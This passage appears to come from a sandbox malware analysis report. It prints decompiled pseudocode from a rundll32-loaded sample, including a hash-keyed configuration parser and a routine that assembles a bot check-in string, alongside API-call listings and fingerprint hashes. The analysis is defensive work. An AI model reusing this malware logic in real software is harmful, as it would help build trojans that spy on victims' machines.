								if( *0x547d25c <= 6) {
									_t42 =  *0x547d27c; // 0x1f6a5a8
									_t15 = _t42 + 0x547ec2a; // 0x52384549
									E054789D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x547d27c; // 0x1f6a5a8
							_t17 = _t38 + 0x547ee18; // 0x73e93c0
							_t18 = _t38 + 0x547edf0; // 0x680043
							_t45 = E05472659(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0x547d238, 0, _t55);
						}
					}
					HeapFree( *0x547d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E05471F99(_t54);
				}
				return _t45;
			}
















                                                  0x054773fd
                                                  0x0547740d
                                                  0x05477410
                                                  0x05477417
                                                  0x05477419
                                                  0x05477419
                                                  0x0547741c
                                                  0x05477421
                                                  0x05477428
                                                  0x0547743a
                                                  0x0547743e
                                                  0x0547744c
                                                  0x0547745a
                                                  0x0547745e
                                                  0x054774ef
                                                  0x054774ef
                                                  0x05477464
                                                  0x05477464
                                                  0x05477469
                                                  0x05477469
                                                  0x05477470
                                                  0x0547747c
                                                  0x0547747e
                                                  0x05477480
                                                  0x05477482
                                                  0x05477489
                                                  0x0547749b
                                                  0x0547749d
                                                  0x054774a4
                                                  0x054774a6
                                                  0x054774ad
                                                  0x054774b8
                                                  0x054774b8
                                                  0x054774a4
                                                  0x054774bd
                                                  0x054774c2
                                                  0x054774c9
                                                  0x054774e7
                                                  0x054774e9
                                                  0x054774e9
                                                  0x05477480
                                                  0x054774fb
                                                  0x054774fb
                                                  0x054774fd
                                                  0x05477502
                                                  0x05477504
                                                  0x05477504
                                                  0x0547750f

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,073E93C0,?,00000000,30314549,00000014,004F0053,073E937C), ref: 054774E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,05476814), ref: 054774FB
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: f3a72237dffabf83438e2fca2ba1231770ee347a9ea5d68235b7273040ac499b
                                                  • Instruction ID: 4d0d59f6ad15576af7db78d2c90172d4a85dacae3934d8df494b5f13db6a7a2a
                                                  • Opcode Fuzzy Hash: f3a72237dffabf83438e2fca2ba1231770ee347a9ea5d68235b7273040ac499b
                                                  • Instruction Fuzzy Hash: FD31C171A1010DBFDF15DBA1DC89DEA7FBCEF04214F4401A6B600A7220D7709E25DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 054721CD, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 351 54721cd-54721e0 call 54784d5 353 54721e5-54721f3 call 54712d4 351->353 356 54721f5-5472202 call 547809f 353->356 357 5472222 353->357 362 5472204-547220d 356->362 363 5472211-547221c HeapFree 356->363 358 5472224-547222d call 54784d5 357->358 366 5472252-5472258 358->366 367 547222f-547223c 358->367 362->353 365 547220f 362->365 363->357 365->358 368 547223e-5472242 367->368 369 547224c 367->369 368->369 370 5472244-547224a 368->370 371 547224f 369->371 370->371 371->366
                                                  C-Code - Quality: 70%
                                                  			E054721CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x547d330;
				E054784D5();
				while(1) {
					_t8 = E054712D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E0547809F(_t14);
					if(_t15 == 0) {
						HeapFree( *0x547d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E054784D5();
					if(_t19 != 0) {
						_t22 =  *0x547d338; // 0x73e9b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                                  0x054721d5
                                                  0x054721d9
                                                  0x054721da
                                                  0x054721db
                                                  0x054721e0
                                                  0x054721e5
                                                  0x054721ec
                                                  0x054721f3
                                                  0x00000000
                                                  0x00000000
                                                  0x054721f5
                                                  0x054721fa
                                                  0x054721fb
                                                  0x05472202
                                                  0x0547221c
                                                  0x00000000
                                                  0x05472204
                                                  0x05472204
                                                  0x05472206
                                                  0x05472209
                                                  0x0547220d
                                                  0x00000000
                                                  0x00000000
                                                  0x0547220f
                                                  0x0547220d
                                                  0x05472224
                                                  0x05472224
                                                  0x05472226
                                                  0x0547222d
                                                  0x0547222f
                                                  0x05472235
                                                  0x0547223c
                                                  0x0547224c
                                                  0x05472244
                                                  0x05472247
                                                  0x05472247
                                                  0x0547224f
                                                  0x0547224f
                                                  0x05472258
                                                  0x05472258
                                                  0x05472222
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 054784D5: GetProcAddress.KERNEL32(36776F57,054721E5), ref: 054784F0
                                                    • Part of subcall function 054712D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 054712FF
                                                    • Part of subcall function 054712D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 05471321
                                                    • Part of subcall function 054712D4: memset.NTDLL ref: 0547133B
                                                    • Part of subcall function 054712D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 05471379
                                                    • Part of subcall function 054712D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 0547138D
                                                    • Part of subcall function 054712D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 054713A4
                                                    • Part of subcall function 054712D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 054713B0
                                                    • Part of subcall function 054712D4: lstrcat.KERNEL32(?,642E2A5C), ref: 054713F1
                                                    • Part of subcall function 054712D4: FindFirstFileA.KERNELBASE(?,?), ref: 05471407
                                                    • Part of subcall function 0547809F: lstrlen.KERNEL32(?,00000000,0547D330,00000001,05472200,0547D00C,0547D00C,00000000,00000005,00000000,00000000,?,?,?,054796C1,054723E9), ref: 054780A8
                                                    • Part of subcall function 0547809F: mbstowcs.NTDLL ref: 054780CF
                                                    • Part of subcall function 0547809F: memset.NTDLL ref: 054780E1
                                                  • HeapFree.KERNEL32(00000000,0547D00C,0547D00C,0547D00C,00000000,00000005,00000000,00000000,?,?,?,054796C1,054723E9,0547D00C,?,054723E9), ref: 0547221C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: e1bb51aac34c934617e197fc075792940e5e60c624430ecb6b834314f18ba12e
                                                  • Instruction ID: 19f179cdd2860989fe2afa7c062983786db315e6f6d8b9e323c1933ff71ac662
                                                  • Opcode Fuzzy Hash: e1bb51aac34c934617e197fc075792940e5e60c624430ecb6b834314f18ba12e
                                                  • Instruction Fuzzy Hash: FB01283971820CBAE7089EE6CD84FEB76A9FF45264F40007BBA45D6190DBE5DC429760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 05474094, Relevance: 9.2, APIs: 6, Instructions: 223memoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E05474094(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x547d278; // 0x63699bc3
				if(E05478748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x547d2d4 = _v12;
				}
				_t25 =  *0x547d278; // 0x63699bc3
				if(E05478748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x547d278; // 0x63699bc3
						_t31 = E05473F7C(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x547d240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x547d278; // 0x63699bc3
						_t32 = E05473F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x547d244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x547d278; // 0x63699bc3
						_t33 = E05473F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x547d248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x547d278; // 0x63699bc3
						_t34 = E05473F7C(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x547d004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x547d278; // 0x63699bc3
						_t35 = E05473F7C(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x547d02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x547d278; // 0x63699bc3
						_t36 = E05473F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E05476ED2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E0547A5D6();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x547d278; // 0x63699bc3
						_t37 = E05473F7C(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E05476ED2(0, _t37) != 0) {
						_t102 =  *0x547d32c; // 0x73e95b0
						E054775E9(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x547d278; // 0x63699bc3
						_t38 = E05473F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x547d27c; // 0x1f6a5a8
						_t18 = _t39 + 0x547e252; // 0x616d692f
						 *0x547d2d0 = _t18;
						goto L52;
					} else {
						_t49 = E05476ED2(0, _t38);
						 *0x547d2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x547d278; // 0x63699bc3
								_t41 = E05473F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x547d27c; // 0x1f6a5a8
								_t19 = _t42 + 0x547e791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E05476ED2(0, _t41);
							}
							 *0x547d340 = _t43;
							HeapFree( *0x547d238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}


































                                                  0x05474094
                                                  0x05474097
                                                  0x054740b7
                                                  0x054740c5
                                                  0x054740c5
                                                  0x054740ca
                                                  0x054740e4
                                                  0x054742e2
                                                  0x054742e4
                                                  0x00000000
                                                  0x054740ea
                                                  0x054740ea
                                                  0x054740f1
                                                  0x05474107
                                                  0x054740f3
                                                  0x054740f3
                                                  0x05474100
                                                  0x05474100
                                                  0x05474111
                                                  0x05474113
                                                  0x0547411d
                                                  0x05474122
                                                  0x05474122
                                                  0x0547411d
                                                  0x05474129
                                                  0x0547413f
                                                  0x0547412b
                                                  0x0547412b
                                                  0x05474138
                                                  0x05474138
                                                  0x05474143
                                                  0x05474145
                                                  0x0547414f
                                                  0x05474154
                                                  0x05474154
                                                  0x0547414f
                                                  0x0547415b
                                                  0x05474171
                                                  0x0547415d
                                                  0x0547415d
                                                  0x0547416a
                                                  0x0547416a
                                                  0x05474175
                                                  0x05474177
                                                  0x05474181
                                                  0x05474186
                                                  0x05474186
                                                  0x05474181
                                                  0x0547418d
                                                  0x054741a3
                                                  0x0547418f
                                                  0x0547418f
                                                  0x0547419c
                                                  0x0547419c
                                                  0x054741a7
                                                  0x054741a9
                                                  0x054741b3
                                                  0x054741b8
                                                  0x054741b8
                                                  0x054741b3
                                                  0x054741bf
                                                  0x054741d5
                                                  0x054741c1
                                                  0x054741c1
                                                  0x054741ce
                                                  0x054741ce
                                                  0x054741d9
                                                  0x054741db
                                                  0x054741e5
                                                  0x054741ea
                                                  0x054741ea
                                                  0x054741e5
                                                  0x054741f1
                                                  0x05474207
                                                  0x054741f3
                                                  0x054741f3
                                                  0x05474200
                                                  0x05474200
                                                  0x0547420b
                                                  0x0547420d
                                                  0x05474210
                                                  0x05474211
                                                  0x05474218
                                                  0x0547421a
                                                  0x0547421b
                                                  0x0547421b
                                                  0x05474218
                                                  0x05474222
                                                  0x05474238
                                                  0x05474224
                                                  0x05474224
                                                  0x05474231
                                                  0x05474231
                                                  0x0547423c
                                                  0x0547424a
                                                  0x05474254
                                                  0x05474254
                                                  0x0547425b
                                                  0x05474271
                                                  0x0547425d
                                                  0x0547425d
                                                  0x0547426a
                                                  0x0547426a
                                                  0x05474275
                                                  0x05474288
                                                  0x05474288
                                                  0x0547428d
                                                  0x05474293
                                                  0x00000000
                                                  0x05474277
                                                  0x0547427a
                                                  0x05474281
                                                  0x05474286
                                                  0x05474298
                                                  0x0547429a
                                                  0x054742b0
                                                  0x0547429c
                                                  0x0547429c
                                                  0x054742a9
                                                  0x054742a9
                                                  0x054742b4
                                                  0x054742c0
                                                  0x054742c5
                                                  0x054742c5
                                                  0x054742b6
                                                  0x054742b9
                                                  0x054742b9
                                                  0x054742d3
                                                  0x054742d8
                                                  0x054742e5
                                                  0x054742e9
                                                  0x054742e9
                                                  0x00000000
                                                  0x05474286
                                                  0x05474275

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 05474119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 0547414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 0547417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 054741AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 054741E1
                                                  • HeapFree.KERNEL32(00000000,054723DE,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 054742D8
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 36edddc385efea8d8e37d6c94d59879a55a59b5457027850d28ad3175ddca5f7
                                                  • Instruction ID: e3a5c5c8b8472ea665f295bffd5a00f340d26cb15174359c0be56a2707d76a75
                                                  • Opcode Fuzzy Hash: 36edddc385efea8d8e37d6c94d59879a55a59b5457027850d28ad3175ddca5f7
                                                  • Instruction Fuzzy Hash: 666152B0B2411CAADF18EFB5DD899FB7BEDEB48250B644E57A502D7204EE30D9428720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547A279, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 66%
                                                  			E0547A279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x547d018; // 0xf56cfa1f
				asm("bswap eax");
				_t27 =  *0x547d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x547d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x547d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0x547d27c; // 0x1f6a5a8
				_t3 = _t30 + 0x547e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x547d02c,  *0x547d004, _t25);
				_t33 = E05471C1A();
				_t34 =  *0x547d27c; // 0x1f6a5a8
				_t4 = _t34 + 0x547e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E054754BC(_t91);
				if(_t96 != 0) {
					_t83 =  *0x547d27c; // 0x1f6a5a8
					_t6 = _t83 + 0x547e8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x547d238, 0, _t96);
				}
				_t97 = E05477649();
				if(_t97 != 0) {
					_t78 =  *0x547d27c; // 0x1f6a5a8
					_t8 = _t78 + 0x547e8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x547d238, 0, _t97);
				}
				_t98 =  *0x547d32c; // 0x73e95b0
				_a32 = E05479395(0x547d00a, _t98 + 4);
				_t42 =  *0x547d2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x547d27c; // 0x1f6a5a8
					_t11 = _t74 + 0x547e8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x547d2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x547d27c; // 0x1f6a5a8
					_t13 = _t71 + 0x547e8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x547d238, 0, 0x800);
					if(_t100 != 0) {
						E05477A80(GetTickCount());
						_t50 =  *0x547d32c; // 0x73e95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x547d32c; // 0x73e95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x547d32c; // 0x73e95b0
						_t103 = E05478307(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x547c2ac);
							_push(_t103);
							_t62 = E05473CC8();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E05471199(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E0547A1B0();
								}
								HeapFree( *0x547d238, 0, _v44);
							}
							HeapFree( *0x547d238, 0, _t103);
						}
						HeapFree( *0x547d238, 0, _t100);
					}
					HeapFree( *0x547d238, 0, _a24);
				}
				HeapFree( *0x547d238, 0, _t105);
				return _a12;
			}
















































                                                  0x0547a279
                                                  0x0547a279
                                                  0x0547a279
                                                  0x0547a280
                                                  0x0547a286
                                                  0x0547a28e
                                                  0x0547a290
                                                  0x0547a290
                                                  0x0547a29d
                                                  0x0547a2a8
                                                  0x0547a2ab
                                                  0x0547a2b6
                                                  0x0547a2b9
                                                  0x0547a2be
                                                  0x0547a2c1
                                                  0x0547a2c6
                                                  0x0547a2c9
                                                  0x0547a2d5
                                                  0x0547a2e2
                                                  0x0547a2e4
                                                  0x0547a2ea
                                                  0x0547a2ef
                                                  0x0547a2fa
                                                  0x0547a2fc
                                                  0x0547a2ff
                                                  0x0547a306
                                                  0x0547a30a
                                                  0x0547a30c
                                                  0x0547a311
                                                  0x0547a31d
                                                  0x0547a31f
                                                  0x0547a32b
                                                  0x0547a32d
                                                  0x0547a32d
                                                  0x0547a338
                                                  0x0547a33c
                                                  0x0547a33e
                                                  0x0547a343
                                                  0x0547a34f
                                                  0x0547a351
                                                  0x0547a35d
                                                  0x0547a35f
                                                  0x0547a35f
                                                  0x0547a365
                                                  0x0547a378
                                                  0x0547a37c
                                                  0x0547a383
                                                  0x0547a386
                                                  0x0547a38b
                                                  0x0547a396
                                                  0x0547a398
                                                  0x0547a39b
                                                  0x0547a39b
                                                  0x0547a39d
                                                  0x0547a3a4
                                                  0x0547a3a7
                                                  0x0547a3ac
                                                  0x0547a3b6
                                                  0x0547a3b8
                                                  0x0547a3c0
                                                  0x0547a3d9
                                                  0x0547a3dd
                                                  0x0547a3e9
                                                  0x0547a3ee
                                                  0x0547a3f7
                                                  0x0547a408
                                                  0x0547a40c
                                                  0x0547a415
                                                  0x0547a41b
                                                  0x0547a428
                                                  0x0547a435
                                                  0x0547a43b
                                                  0x0547a447
                                                  0x0547a44d
                                                  0x0547a44e
                                                  0x0547a455
                                                  0x0547a459
                                                  0x0547a45f
                                                  0x0547a466
                                                  0x0547a46d
                                                  0x0547a473
                                                  0x0547a47a
                                                  0x0547a47e
                                                  0x0547a489
                                                  0x0547a490
                                                  0x0547a494
                                                  0x0547a49d
                                                  0x0547a49d
                                                  0x0547a4ae
                                                  0x0547a4ae
                                                  0x0547a4bd
                                                  0x0547a4bd
                                                  0x0547a4cc
                                                  0x0547a4cc
                                                  0x0547a4de
                                                  0x0547a4de
                                                  0x0547a4ed
                                                  0x0547a4fe

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0547A290
                                                  • wsprintfA.USER32 ref: 0547A2DD
                                                  • wsprintfA.USER32 ref: 0547A2FA
                                                  • wsprintfA.USER32 ref: 0547A31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 0547A32D
                                                  • wsprintfA.USER32 ref: 0547A34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 0547A35F
                                                  • wsprintfA.USER32 ref: 0547A396
                                                  • wsprintfA.USER32 ref: 0547A3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0547A3D3
                                                  • GetTickCount.KERNEL32 ref: 0547A3E3
                                                  • RtlEnterCriticalSection.NTDLL(073E9570), ref: 0547A3F7
                                                  • RtlLeaveCriticalSection.NTDLL(073E9570), ref: 0547A415
                                                    • Part of subcall function 05478307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,0547A428,?,073E95B0), ref: 05478332
                                                    • Part of subcall function 05478307: lstrlen.KERNEL32(?,?,?,0547A428,?,073E95B0), ref: 0547833A
                                                    • Part of subcall function 05478307: strcpy.NTDLL ref: 05478351
                                                    • Part of subcall function 05478307: lstrcat.KERNEL32(00000000,?), ref: 0547835C
                                                    • Part of subcall function 05478307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0547A428,?,073E95B0), ref: 05478379
                                                  • StrTrimA.SHLWAPI(00000000,0547C2AC,?,073E95B0), ref: 0547A447
                                                    • Part of subcall function 05473CC8: lstrlen.KERNEL32(073E87FA,00000000,00000000,74ECC740,0547A453,00000000), ref: 05473CD8
                                                    • Part of subcall function 05473CC8: lstrlen.KERNEL32(?), ref: 05473CE0
                                                    • Part of subcall function 05473CC8: lstrcpy.KERNEL32(00000000,073E87FA), ref: 05473CF4
                                                    • Part of subcall function 05473CC8: lstrcat.KERNEL32(00000000,?), ref: 05473CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 0547A466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0547A46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 0547A47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0547A47E
                                                    • Part of subcall function 05471199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 0547124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0547A4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0547A4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,073E95B0), ref: 0547A4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 0547A4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 0547A4ED
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID:
                                                  • API String ID: 3080378247-0
                                                  • Opcode ID: 6f6d37394cd94e89241f3dc744173e837f762cfd0f1b5c8ef2f37a217622b58b
                                                  • Instruction ID: 8fd5d2404ce63ee54a62dadf0219eac9aabc18fef84bb20555868aa27437b3e4
                                                  • Opcode Fuzzy Hash: 6f6d37394cd94e89241f3dc744173e837f762cfd0f1b5c8ef2f37a217622b58b
